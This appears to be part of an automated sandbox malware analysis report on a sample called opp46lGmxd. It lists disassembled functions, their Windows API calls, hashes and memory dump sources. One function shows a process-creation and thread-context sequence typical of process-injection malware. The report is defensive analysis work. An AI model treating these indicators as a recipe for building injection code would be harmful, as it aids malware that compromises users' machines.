                                                      • Instruction ID: 672a3fae91fd685a8ef91738a682ec20c61c8dc7824b8c58fd937916dea784ed
                                                      • Opcode Fuzzy Hash: 7a345965404b392e85f4b60d4760ffd122435acde8366f0ba82977351ddd2056
                                                      • Instruction Fuzzy Hash: D801F972C04218AEDB28D7A8CC1AFFE7BFCDB01301F00419FF552D2181E575A60497A0
                                                      Function 00AC9B6D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetTempPathW.KERNEL32(00000104,?), ref: 00AC9B82
                                                      • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00AC9B99
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Temp$FileNamePath
                                                      • String ID: aut
                                                      • API String ID: 3285503233-3010740371
                                                      • Opcode ID: 707bdb002d49a6c23484a4157e0e07ad4954d4497b34be449b36d635388131ee
                                                      • Instruction ID: c9edeecf98ae173fbb39206e0fe76cd14fed0f7efe7996c596af476bd1c674ee
                                                      • Opcode Fuzzy Hash: 707bdb002d49a6c23484a4157e0e07ad4954d4497b34be449b36d635388131ee
                                                      • Instruction Fuzzy Hash: 58D05E7954030DAFDB10EBD4DC4EFDA776CE704700F0042A1BF54991A2DEB065998B92
                                                      Function 00ADCDF1 Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6f8942c4223c55b2ff0398818ac5aa3e43e5d25cce3d2e18fb6da6fd2598ff17
                                                      • Instruction ID: 4da76491158f50efb37a80b5869d738308dae0584f6abcaec7c8da86563f85b7
                                                      • Opcode Fuzzy Hash: 6f8942c4223c55b2ff0398818ac5aa3e43e5d25cce3d2e18fb6da6fd2598ff17
                                                      • Instruction Fuzzy Hash: AFF117716083419FCB14DF28C584A6ABBE5FF88314F54892EF89A9B351D731E946CF82
                                                      Function 00A6F8CF Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A803A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00A803D3
                                                        • Part of subcall function 00A803A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 00A803DB
                                                        • Part of subcall function 00A803A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00A803E6
                                                        • Part of subcall function 00A803A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00A803F1
                                                        • Part of subcall function 00A803A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 00A803F9
                                                        • Part of subcall function 00A803A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00A80401
                                                        • Part of subcall function 00A76259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00A6FA90), ref: 00A762B4
                                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00A6FB2D
                                                      • OleInitialize.OLE32(00000000), ref: 00A6FBAA
                                                      • CloseHandle.KERNEL32(00000000), ref: 00AA49F2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                      • String ID:
                                                      • API String ID: 1986988660-0
                                                      • Opcode ID: c38c83851d25e8f4540f872dcf6dcd2507787c399c63c99cb4dcfa29b7242ad9
                                                      • Instruction ID: d529096d6cffbd2b30c97f251a452d7246d313ef9872c90fdfcbf4e162a33626
                                                      • Opcode Fuzzy Hash: c38c83851d25e8f4540f872dcf6dcd2507787c399c63c99cb4dcfa29b7242ad9
                                                      • Instruction Fuzzy Hash: 4C81A7B0901290CEC3A8EF69BE516157BF4FBA830871081AAE4A8C7372EF3559078F55
                                                      Function 00A643DB Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 00A64401
                                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00A644A6
                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00A644C3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: IconNotifyShell_$_memset
                                                      • String ID:
                                                      • API String ID: 1505330794-0
                                                      • Opcode ID: 1a8960217cffa42589f65edc4cf05b0a4a6022af849fac8c3a53dfc20e6ee294
                                                      • Instruction ID: 5be5b2905473c92e08056d0f0b57dabde3c630c21c5497af7adbe3ff9ebc1e72
                                                      • Opcode Fuzzy Hash: 1a8960217cffa42589f65edc4cf05b0a4a6022af849fac8c3a53dfc20e6ee294
                                                      • Instruction Fuzzy Hash: 23316FB1504701CFD721DF64D889B9BBBF8FB49304F000A2EE59A87291EB75A944CB92
                                                      Function 00A8594C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __FF_MSGBANNER.LIBCMT ref: 00A85963
                                                        • Part of subcall function 00A8A3AB: __NMSG_WRITE.LIBCMT ref: 00A8A3D2
                                                        • Part of subcall function 00A8A3AB: __NMSG_WRITE.LIBCMT ref: 00A8A3DC
                                                      • __NMSG_WRITE.LIBCMT ref: 00A8596A
                                                        • Part of subcall function 00A8A408: GetModuleFileNameW.KERNEL32(00000000,00B243BA,00000104,?,00000001,00000000), ref: 00A8A49A
                                                        • Part of subcall function 00A8A408: ___crtMessageBoxW.LIBCMT ref: 00A8A548
                                                        • Part of subcall function 00A832DF: ___crtCorExitProcess.LIBCMT ref: 00A832E5
                                                        • Part of subcall function 00A832DF: ExitProcess.KERNEL32 ref: 00A832EE
                                                        • Part of subcall function 00A88D68: __getptd_noexit.LIBCMT ref: 00A88D68
                                                      • RtlAllocateHeap.NTDLL(01580000,00000000,00000001,00000000,?,?,?,00A81013,?), ref: 00A8598F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                      • String ID:
                                                      • API String ID: 1372826849-0
                                                      • Opcode ID: a91d3f1a50f9b4d47c81b79096ee08afe0f9cfba6db666d55e32b033d377b695
                                                      • Instruction ID: 622a139c60412546c6ae10d65946d34329477afb8d2ee686cb9769dd7049f1c6
                                                      • Opcode Fuzzy Hash: a91d3f1a50f9b4d47c81b79096ee08afe0f9cfba6db666d55e32b033d377b695
                                                      • Instruction Fuzzy Hash: 7C01F132B00B15EEEA257B75ED42A6E7298CF52B70F50002AF800AB1C1EE709D0287A1
                                                      Function 00AC9B2C Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00AC97D2,?,?,?,?,?,00000004), ref: 00AC9B45
                                                      • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00AC97D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00AC9B5B
                                                      • CloseHandle.KERNEL32(00000000,?,00AC97D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00AC9B62
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: File$CloseCreateHandleTime
                                                      • String ID:
                                                      • API String ID: 3397143404-0
                                                      • Opcode ID: 53a6a4183176ffe83760fe06a4f4f6f33260f927d9d79e8fd463151064e402c7
                                                      • Instruction ID: 32ae88104263f2453b5dd80d75027f80194edad66217664560f07c6a482c180f
                                                      • Opcode Fuzzy Hash: 53a6a4183176ffe83760fe06a4f4f6f33260f927d9d79e8fd463151064e402c7
                                                      • Instruction Fuzzy Hash: AEE08632181218BBD7216B94EC4DFCA7B28EB05761F108220FB246D0E087B129129798
                                                      Function 00AC8F97 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _free.LIBCMT ref: 00AC8FA5
                                                        • Part of subcall function 00A82F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00A89C64), ref: 00A82FA9
                                                        • Part of subcall function 00A82F95: GetLastError.KERNEL32(00000000,?,00A89C64), ref: 00A82FBB
                                                      • _free.LIBCMT ref: 00AC8FB6
                                                      • _free.LIBCMT ref: 00AC8FC8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                                                      • Instruction ID: b111fe2ab2329b49ff0765fa3e79401cf85bfd2e33ecb5566a2035d183f32305
                                                      • Opcode Fuzzy Hash: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                                                      • Instruction Fuzzy Hash: EDE012B16097015ACA24B678AE40FA357EE6F48350B19081DB50ADB142DE28EC51C3A4
                                                      Function 00A6AB23 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: CALL
                                                      • API String ID: 0-4196123274
                                                      • Opcode ID: be0d8fc2fd5bc0703620be1e72a0847cdb316cb83dd12fac1bfb103c7a084f82
                                                      • Instruction ID: cf9fb26f4381a788ad2ccd0fe39d2877bbe16c89ddb429854752413f25a42be7
                                                      • Opcode Fuzzy Hash: be0d8fc2fd5bc0703620be1e72a0847cdb316cb83dd12fac1bfb103c7a084f82
                                                      • Instruction Fuzzy Hash: F4224874608241CFCB24DF14C990B6ABBF1BF95304F15895DE89A9B362DB31ED85CB82
                                                      Function 00A64DD0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID: EA06
                                                      • API String ID: 4104443479-3962188686
                                                      • Opcode ID: f4f2aec3746f89302e5e0645933a11aebd45e35e704b65806b653a5743fd021c
                                                      • Instruction ID: 22814892176c1ead854c3bec770f9423df8a597ccf4f3ace26761767bae622f1
                                                      • Opcode Fuzzy Hash: f4f2aec3746f89302e5e0645933a11aebd45e35e704b65806b653a5743fd021c
                                                      • Instruction Fuzzy Hash: 05413A71E04558AFDF219B64C9617FF7FB6AF49300F684075F8829B282C6269D8487E1
                                                      Function 00A6492E Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • IsThemeActive.UXTHEME ref: 00A64992
                                                        • Part of subcall function 00A835AC: __lock.LIBCMT ref: 00A835B2
                                                        • Part of subcall function 00A835AC: DecodePointer.KERNEL32(00000001,?,00A649A7,00AB81BC), ref: 00A835BE
                                                        • Part of subcall function 00A835AC: EncodePointer.KERNEL32(?,?,00A649A7,00AB81BC), ref: 00A835C9
                                                        • Part of subcall function 00A64A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00A64A73
                                                        • Part of subcall function 00A64A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00A64A88
                                                        • Part of subcall function 00A63B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00A63B7A
                                                        • Part of subcall function 00A63B4C: IsDebuggerPresent.KERNEL32 ref: 00A63B8C
                                                        • Part of subcall function 00A63B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,00B262F8,00B262E0,?,?), ref: 00A63BFD
                                                        • Part of subcall function 00A63B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00A63C81
                                                      • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00A649D2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                      • String ID:
                                                      • API String ID: 1438897964-0
                                                      • Opcode ID: e52e8ffb0dcb4aacc2478f5e5c0253e423c1a1de1302c2a695c97429b55dd3b8
                                                      • Instruction ID: 01c9eef5c7bbc5064cf24ea82c469348e9a7982d80e98b28763f77238759850a
                                                      • Opcode Fuzzy Hash: e52e8ffb0dcb4aacc2478f5e5c0253e423c1a1de1302c2a695c97429b55dd3b8
                                                      • Instruction Fuzzy Hash: 20118972908351AFC710EF68ED4590ABBF8EB98750F00891EF095872A1DB709A46CB96
                                                      Function 00A65DF9 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00A65981,?,?,?,?), ref: 00A65E27
                                                      • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00A65981,?,?,?,?), ref: 00A9E19C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: 38a246b27ac8acffdb20123fa3e417657899c11756b20529b3267fe485db3896
                                                      • Instruction ID: cfc5293e6be6c6567844e0947d95d34d5caf1a8f817aa07d053f0e8b346680b9
                                                      • Opcode Fuzzy Hash: 38a246b27ac8acffdb20123fa3e417657899c11756b20529b3267fe485db3896
                                                      • Instruction Fuzzy Hash: 1001B170644708BEFB248F24CC8AF663BECEB01768F14C318BAE56A1E0C6B51E458B50
                                                      Function 00A80FF6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A8594C: __FF_MSGBANNER.LIBCMT ref: 00A85963
                                                        • Part of subcall function 00A8594C: __NMSG_WRITE.LIBCMT ref: 00A8596A
                                                        • Part of subcall function 00A8594C: RtlAllocateHeap.NTDLL(01580000,00000000,00000001,00000000,?,?,?,00A81013,?), ref: 00A8598F
                                                      • std::exception::exception.LIBCMT ref: 00A8102C
                                                      • __CxxThrowException@8.LIBCMT ref: 00A81041
                                                        • Part of subcall function 00A887DB: RaiseException.KERNEL32(?,?,?,00B1BAF8,00000000,?,?,?,?,00A81046,?,00B1BAF8,?,00000001), ref: 00A88830
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                      • String ID:
                                                      • API String ID: 3902256705-0
                                                      • Opcode ID: 28788d00d97d40213ff46bff2e6d1eb4ca5477ad87a16cb5d8a6b986dc296548
                                                      • Instruction ID: 66f19ff8f0e57179323d5473dbc4888cfe591a3a36d360fcb530cb1140b125c0
                                                      • Opcode Fuzzy Hash: 28788d00d97d40213ff46bff2e6d1eb4ca5477ad87a16cb5d8a6b986dc296548
                                                      • Instruction Fuzzy Hash: B4F0C23554031DA6CB20BBA8EE05AEF7BBCAF01350F500466FD04A6591EFB1CA8187E5
                                                      Function 00A8582D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: __lock_file_memset
                                                      • String ID:
                                                      • API String ID: 26237723-0
                                                      • Opcode ID: 5d374031193e1df0e1b326ab9ddd7c09fc7e83a25b8345161bccf9530135e82d
                                                      • Instruction ID: 293d6b7b1acf7dd4c1a7d2520a561f334b0177892c4222664126739ff312a5fe
                                                      • Opcode Fuzzy Hash: 5d374031193e1df0e1b326ab9ddd7c09fc7e83a25b8345161bccf9530135e82d
                                                      • Instruction Fuzzy Hash: D8014471C00609EBCF22BF798E0599F7B71BF80760F548256BC145A1A1EF358A61EB91
                                                      Function 00A855D6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A88D68: __getptd_noexit.LIBCMT ref: 00A88D68
                                                      • __lock_file.LIBCMT ref: 00A8561B
                                                        • Part of subcall function 00A86E4E: __lock.LIBCMT ref: 00A86E71
                                                      • __fclose_nolock.LIBCMT ref: 00A85626
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                      • String ID:
                                                      • API String ID: 2800547568-0
                                                      • Opcode ID: a59ad8228751d5e627c0ba868ef4cae7b6d5b7040e769adaf8293f39888c4c0e
                                                      • Instruction ID: f792ce78a2f59126b427c6286af3f29a1ca5e36bf9659e5f33255fb64c97fb3e
                                                      • Opcode Fuzzy Hash: a59ad8228751d5e627c0ba868ef4cae7b6d5b7040e769adaf8293f39888c4c0e
                                                      • Instruction Fuzzy Hash: 8CF0B471C00A049ADB20BF75890676E77E16F40734F998219A814AB1C1EF7C89419B95
                                                      Function 03D812FD Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 03D81ABB
                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03D81B51
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03D81B73
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1399187842.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3d80000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                      • String ID:
                                                      • API String ID: 2438371351-0
                                                      • Opcode ID: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
                                                      • Instruction ID: 6ba801917410782e92656b91c5bf9bb8552dc78715aa10f4338841ee2f005aa8
                                                      • Opcode Fuzzy Hash: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
                                                      • Instruction Fuzzy Hash: 3A12EE24E24658C6EB24DF64D8507DEB232EF68300F1090E9910DEB7A4E77A5F85CF5A
                                                      Function 00A72123 Relevance: 1.7, APIs: 1, Instructions: 171COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
